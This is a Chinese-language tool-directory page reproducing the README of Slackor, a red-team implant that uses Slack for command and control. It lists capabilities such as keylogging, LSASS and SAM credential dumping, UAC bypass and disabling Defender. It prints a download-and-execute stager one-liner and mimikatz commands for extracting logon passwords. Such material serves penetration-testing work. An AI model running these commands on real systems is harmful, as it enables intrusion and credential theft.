Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
工具/GitHubGitHub/coalfire-research/slackor
密码破解权限提升密码攻击Payload生成持久化机制横向移动Shellcode后渗透利用渗透测试命令与控制红队密码攻击 分类第 18 名
46010866年前Kitploit 审核通过

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享
密码破解 分类第 18 名
GitHubcoalfire-research/slackor

Slackor

一个用Golang编写的植入程序,使用Slack作为命令与控制服务器。

查看仓库网站

Slackor

维护于 https://github.com/n00py/Slackor

一个使用Slack作为命令与控制通道的Golang植入程序。

本项目受 Gcat 和 Twittor 启发。

Slackor Screenshot Wireshark Screenshot 本工具作为概念验证发布。在创建任何Slack应用之前,请务必阅读并理解 Slack App Developer Policy。

设置

注意:服务器使用Python 3编写

要使其工作,您需要:

  • 一个Slack工作区
  • 使用以下权限注册一个应用:
    • channels:read
    • channels:history
    • channels:write
    • files:write:user
    • files:read
  • 创建一个机器人

此仓库包含五个文件:

  • install.sh 安装依赖
  • setup.py 创建Slack频道、数据库和植入程序的脚本
  • agent.py 生成新植入程序的脚本
  • server.py Slackor服务器,设计在Linux上运行
  • agent.go Golang植入程序
  • requirements.txt Python依赖(自动安装)

开始使用:

  • go get github.com/Coalfire-Research/Slackor
  • cd $GOPATH/src/github.com/Coalfire-Research/Slackor
  • 运行 install.sh
  • 运行 setup.py
    • 提供来自应用的OAuth Access Token和Bot User OAuth Access Token

成功运行脚本后,dist/目录中将创建多个文件:

  • agent.windows.exe: Windows 64位二进制文件
  • agent.upx.exe: Windows 64位二进制文件,UPX压缩
  • agent.darwin: macOS 64位二进制文件
  • agent.32.linux: Linux 32位二进制文件
  • agent.64.linux: Linux 64位二进制文件

在Linux主机上启动server.py后,执行上述适合目标主机的任意代理程序。

运行"stager"模块以生成单行命令和其他dropper。

root@kitploit:~
powershell.exe iwr [URL] -o C:\Users\Public\[NAME].exe; forfiles.exe /p c:\windows\system32 /m svchost.exe /c C:\Users\Public\[NAME]; timeout 2; del C:\Users\Public\[NAME].exe

这将执行InvokeWebRequest(PS v.3+)下载有效载荷,使用LOLBin执行它,一旦终止后自我删除。这是一个工作示例,但可以调整命令以使用其他下载方法或执行方法。

用法

输入"help"或按[TAB]键查看可用命令列表。输入"help [COMMAND]"查看命令描述。

(Slackor)

  • help - 显示帮助菜单
  • interact - 与一个代理交互
  • list - 列出所有注册的代理
  • remove - 杀死并移除一个代理
  • revive - 向所有代理发送信号以重新注册到服务器
  • stager - 生成单行命令以下载并执行植入程序
  • quit - 退出程序
  • wipefiles - 删除Slack中所有上传的文件

一旦代理签到,您可以与其交互。 使用"interact [AGENT]"进入代理提示符。输入"help"或按[TAB]查看可用命令列表。

(Slackor:AGENT)

  • 通用命令
    • back - 返回主菜单
    • beacon - 更改代理每次签到间隔时间(默认为5秒)
    • download - 从代理下载文件到Slackor服务器
    • help - 显示帮助菜单
    • kill - 杀死代理
    • sleep - 使代理休眠一次(输入秒数)
    • sysinfo - 显示当前用户、操作系统版本、系统架构和CPU核心数
    • upload - 从Slackor服务器上传文件到代理
    • wget - 通过HTTP/HTTPS下载任意文件
  • Windows命令
    • bypassuac - 尝试生成高完整性代理
    • cleanup - 移除持久化痕迹
    • clipboard - 获取剪贴板内容
    • defanger - 尝试解除Windows Defender的防护
    • duplicate - 使代理生成自身另一个副本
    • getsystem - 以NTAUTHORITY/SYSTEM身份生成代理
    • keyscan - 在代理上启动键盘记录器
    • minidump - 从lsass.exe转储内存并下载
    • persist - 通过将二进制文件植入ADS创建持久化
    • samdump - 尝试转储SAM文件以离线提取哈希
    • screenshot - 截取桌面屏幕并检索
    • shellcode - 执行x64原始shellcode
  • Mac命令
  • Linux命令
    • screenshot - 截取桌面屏幕并检索

OPSEC注意事项

命令输出和下载的文件除了Slack的TLS传输加密外,还经过AES加密。

模块在执行写入磁盘的任务之前会发出警告。 执行shell命令时,请注意cmd.exe/bash将被执行。这可能在主机上被监控。

以下是一些OPSEC安全的命令,它们不会执行cmd.exe/bash:

  • cat - 打印文件内容
  • cd - 更改目录
  • find - 搜索目录文件名
  • getip - 获取外部IP地址(发送DNS请求)
  • hostname - 显示主机名
  • ifconfig - 显示接口信息
  • ls - 列出目录内容
  • mkdir - 创建目录
  • pwd - 打印当前工作目录
  • rm - 删除文件
  • rmdir - 删除目录
  • whoami / getuid - 打印当前用户

致谢

  • https://github.com/EgeBalci - 函数改编自 HERCULES 和 EGESPLOIT
  • https://github.com/SaturnsVoid - 键盘记录器改编自 GoBot2
  • https://github.com/vyrus001 - x64 shellcode执行 shellGo
  • 加密函数采用自 https://www.golang123.com/topic/1686
  • 持久化思路来自 Enigma0x3
  • Minidump改编自 Merlin,感谢 C-Sto
  • 截图代码来自 kbinani
  • 剪贴板代码来自 atotto
  • Stager生成器来自 hlldz
  • UAC绕过由 winscripting.blog 提供
  • Lulzbin查找由 @vector_sec 提供
  • StackOverflow上的无数讨论
  • 感谢 impacket 用于从SAM/SYS/SECURITY注册表配置单元转储哈希
  • LSASS转储凭据提取由 skelsec 的 pypykatz 实现
  • Bob Aman (Sporkmonger) 各种补充

未来目标

  • DOSfuscation
  • 反射式加载DLL/PE - https://github.com/vyrus001/go-mimikatz
  • 在内存中执行C#程序集 - https://github.com/lesnuages/go-execute-assembly
  • 源代码混淆 https://github.com/unixpickle/gobfuscate

常见问题:

用于红队/渗透测试是否安全?

是的,但有一些条件。虽然数据在传输过程中加密,但代理程序包含解密密钥。 任何获取代理程序副本的人都可以对其进行逆向工程,提取API密钥和AES密钥。 任何破坏或以其他方式访问工作区的人都可能检索其中的所有数据。 因此,不建议对多个组织重复使用同一基础设施。

Mimikatz呢?

植入程序没有内存密码转储功能。 如果您需要logonPasswords,可以尝试以下方法:

root@kitploit:~
(Slackor: AGENT)minidump

这将使用Pypykatz自动提取密码。或者,您可以在Windows上使用Mimikatz。

root@kitploit:~
>mimikatz.exe
mimikatz # sekurlsa::Minidump lsassdump.dmp
mimikatz # sekurlsa::logonPasswords

是否跨平台?

它支持有限的跨平台。尚未在所有可运行的系统上进行全面测试。 服务器设计为在Kali Linux上运行。代理程序编译为Windows、Mac和Linux版本,但主要在Windows 10上测试。代理程序可能会错误处理其平台不支持的命令(不要尝试对Mac进行转储)。

扩展性如何?

可扩展性受限于Slack API。如果您有多个代理,请考虑增加未使用的beacon的信标间隔。

是否容易受到标准信标分析的影响?

目前每个信标内置20%的抖动,信标时间可自定义。只要没有收到新命令,代理的签到请求和响应包每次大小大致相同。

当有更好的方法[y]时,为什么你做了[x]?

我尽力了。欢迎提交PR :)

它被杀毒软件检测到了!

由于现在是开源的,难免会有问题。我会尽力修复模块,但不能保证始终绕过所有杀毒软件。

下载工具